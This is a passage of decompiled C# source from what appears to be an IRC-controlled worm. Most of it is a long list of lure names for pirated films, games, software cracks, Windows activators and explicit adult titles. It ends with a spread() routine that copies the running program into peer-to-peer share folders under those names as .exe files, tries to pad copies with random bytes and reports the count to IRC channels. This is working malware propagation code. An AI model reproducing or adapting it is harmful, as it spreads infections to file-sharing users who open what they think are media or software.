		"fc1", "Time For Africa - ", "Shakira - Waka Waka (FIFA World Cup 2010 Anthem)", "Sherlock Holmes (2009) DVDSCR XviD-MAX", "Sherlock Holmes[2009]DvDrip[Eng]-FXG", "Shes Out of My League (2010) DVDRip XviD-MAX", "Shes.Asstastic.XXX.DVDRip.XviD-XCiTE", "Shrek.Forever.After.TS.XviD-FLAWL3SS", "Shutter Island (2010) R5  XviD-MAX", "Shutter Island[2010]DvDrip[Eng]-FXG",
		"Sims 2", "Slash - Slash CDRip 2010 [Cov+CD][Bubanee]", "Slaughter(2009)DVDRip XviD-EMU[ExtraTorrent]", "Sniper: Ghost Warrior [PC] [DEMO]", "SolidWorks 2010", "Sony Vegas Pro 9.0c Build 896 [32.64 bit][MULTi][Full+Plug-in].i", "Split Second Velocity-RELOADED-[tracker.BTARENA.org].iso", "Squirtmania.5.XXX.DVDRip.XviD-Pr0nStarS", "Star Wars Force Unleashed Ultimate Sith Edition-RELOADED(No Rars", "Starcraft 2 Beta Client US Build 13891",
		"Stargate Universe S01E19 Incursion Part 1 HDTV XviD-FQM [eztv]", "Stargate Universe S01E20 Incursion Part 2 HDTV XviD-FQM [eztv]", "Steinberg Cubase 5.1 - Advanced Music Production System", "Street Fighter IV-RELOADED", "STROMAE - Alors On Danse - Single - 192 kbps", "Suck.Off.Races.3.XXX.DVDRip.XviD-SLiEZE", "Super Mario Galaxy 2 [PAL] [Wii] ", "Supreme_Commander_2-Razor1911", "Taboo I-II-III-IV (1979-1985)", "Taio Cruz - Break Your Heart.mp3",
		"Taylor Swift - Fearless.Platinum Edition+Bonus (2009.JB59)", "Teen.Anal.Nightmare.2.XXX.DVDRip.XVID-DFA", "TeensLikeItBig.-.Aleska.Diamond", "The A Team 2010 TS XViD - IMAGiNE", "The A-Team 2010 TS V2 READNFO XViD - IMAGiNE", "The A-Team 2010 TS XViD - IMAGiNE[TZ]", "The Beatles - Greatest Hits [Remastered/2009/MP3][Bubanee]", "The Big Bang Theory S03E23 The Lunar Excitation HDTV XviD", "fc1", "-FQM [e",
		"The Big Bang Theory S03E23 The Lunar Excitation HDTV XviD-FQM [e", "The Black Keys - Brothers [2010-MP3-Cov][Bubanee]", "The Book of Eli (2010) DVDRip XviD-MAX", "The Book of Eli 2010 720p BluRay x264-WiKi", "The Book Of Eli.2010.BDRip.XviD{1337x}-Noir", "The Bounty Hunter.2010.R5.LiNE.Xvid {1337x}-Noir", "The Hangover (2009) DVDSCR-MAXSPEED", "The Hurt Locker (2008) DVDRip XviD-MAX", "The Last Station (2009) Spanish BRSCR", "The Losers DVDSCR XViD IMAGiNE[ExtraTorrent",
		"fc1", "]", "The Losers DVDSCR XViD IMAGiNE[ExtraTorrent]", "The Other Man (2008) Spanish DVDSCR", "The Road (2009) DVDRip XviD-MAX", "The Settlers 7: Paths To A Kingdom [PC] [CLONEDVD]", "The Sims 3 - Razor1911 Final MAXSPEED", "The Sims 3 + expansions + cracks n keys", "The Sims 3 Ambitions-ViTALiTY-[tracker.BTARENA.org].iso", "The Sims 3 World Adventures-RELOADED",
		"The Sims 3: Ambitions [FULL] * Games4theworld *", "The Temper Trap - Conditions [2009] [320kbps] [1337x]", "The Wolfman (2010) DVDRip XviD-MAX", "The Wolfman[2010][Unrated Edition]DvDrip[Eng]-FXG", "The xx - xx [320kbps]", "The.Daily.Show.2010.06.15.James.Tabor.HDTV.XviD-FQM.[VTV].avi", "The.Other.Woman.2.XXX.DVDRip.XviD-STARLETS", "The.Sims.3.Ambitions-ViTALiTY-[PC]-[Multi]-[2010]-[DirectasXD]", "The.Sims.3.High.End.Loft.Stuff-ViTALiTY", "The.Sims.3-RELOADED",
		"The.Truth.2010.DVDRip.AC3.X264-BARC0DE", "The.Tudors.S04E09.HDTV.XviD-SYS.[VTV].avi", "The.Twilight.Saga.New.Moon.2009.DVDRip.XviD-NeDiVx", "The.Witcher.Enhanced.Edition-SKIDROW", "The_Settlers_7-Razor1911", "This.Aint.Robin.Hood.A.XXX.Parody.XXX.DVDRiP.XviD-DivXfacTory", "Timbaland ft. Katy Perry - If We Ever Meet Again ", "1037", "[.mp3]", "Tom.Clancy’s.Splinter.Cell.Conviction-SKIDROW.iso",
		"Tori Black Is Pretty Filthy (2009) - anal, Rebeca Linares, Marie", "Tori.Black.Nymphomaniac.XXX.DVDRip.XviD-NYMPHO", "train - hey, soul sister", "Train - Save Me San Francisco [2009-mp3-320] [SvC]", "Trey.Songz-Ready-(Retail)-2009-[NoFS]", "True Blood S03E01 720p HDTV X264-DIMENSION [eztv]", "True Blood S03E01 HDTV XviD-NoTV [eztv]", "True Blood Season 1 EZTV releases", "U2 - Discography", "UFC.115.Liddell.vs.Franklin.DSR.XviD-PROPER",
		"UK Top 40 Singles Chart 06-06-2010", "UK Top 40 Singles Chart 13-06-2010", "Unthinkable 2010 Bluray 720p DTS x264-CHD", "Unthinkable 2010 DVDSCR XviD-Rx", "Usher - Raymond Vs Raymond (Full Album) 2010", "Usher ft Will.i.am - OMG [.mp3]", "Usher-Raymond Vs Raymond-2010-P2P", "Valentine's Day[2010]DvDrip[Eng]-FXG", "Warhammer 40000 Dawn Of War II Chaos Rising-Razor1911", "When in Rome DVDRip XviD-DiAMOND",
		"When in Rome[2010]DvDrip[Eng]-FXG", "White Hot Nurses #2", "White Hot Nurses #4", "Wii 4 PC » FIFA WORLD CUP SOUTH AFRICA 2010 perfect emulator is", "Winamp PRO v5.572 Build 2830 + Serials [ChattChitto RG]", "Windows 7 activator crack", "Windows 7 Activator Patch [2010] - [GuruFuel]", "Windows 7 All Editions - Activated x32x64 January 2010[ kk ]", "Windows 7 crack RemoveWAT 2.2.5.Hazar carter67", "Windows 7 Genuine Activation",
		"Windows 7 Ultimate AIO Activated", "Windows 7 Ultimate(32 &amp; 64 bit) Self Activation - Jz", "Windows XP Activation Crack", "Windows XP Home Edition with Service Pack 3 Retail (x86) (TPB)", "WINDOWS_XP_PRO_32-BIT_SP3_ISO_ACTIVATED_GENUINE", "Wings of Prey-ViTALiTY-[tracker.BTARENA.org].iso", "WinRAR v3.90 Final + KeyReg By ChattChitto5", "WinZip PRO FINAL v14.5 + Serials [ChattChitto RG]", "WinZip PRO v", "1037",
		"12.1 + Serials By ChattChitto", "Young Girls With Big Tits 9 [DVDRIP][Teen Over 18]", "Young Money - We Are Young Money (Retail)(GroupRip)(2009)-(Rap-M", "Young Money ft. Lloyd - BedRock [.mp3] - NEW SINGLE", "Young.Money-We.Are.Young.Money-(Retail)-2009-[NoFS]", "YoungPorn.-.Trinity", "Youth In Revolt (2009) DVDRip XviD-ARROW", "Zombieland (2009) DVDRip XviD-MAX"
	};

	private static string ProgamFiles = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);

	public static void spread(irc irc)
	{
		int num = 0;
		try
		{
			string[] peerToPeerNameToShareList = PeerToPeerNameToShareList;
			foreach (string text in peerToPeerNameToShareList)
			{
				string[] peerToPeerClientList = PeerToPeerClientList;
				foreach (string text2 in peerToPeerClientList)
				{
					try
					{
						File.Copy(Application.get_ExecutablePath(), ProgamFiles + text2 + text + ".exe");
						byte[] array = new byte[500];
						new Random().NextBytes(array);
						FileStream fileStream = File.Open(ProgamFiles + text2 + text, FileMode.Append);
						fileStream.Write(array, 0, array.Length);
						num++;
					}
					catch
					{
					}
				}
			}
		}
		catch
		{
		}
		string[][] onConnChannels = config.onConnChannels;
		foreach (string[] array2 in onConnChannels)
		{
			if (num != 0)
			{
				irc.sendMessage(array2[0], ".:P2P:. - \u000308Spreaded \u000309" + num + "\u000308 files!");
			}
		}
	}
}
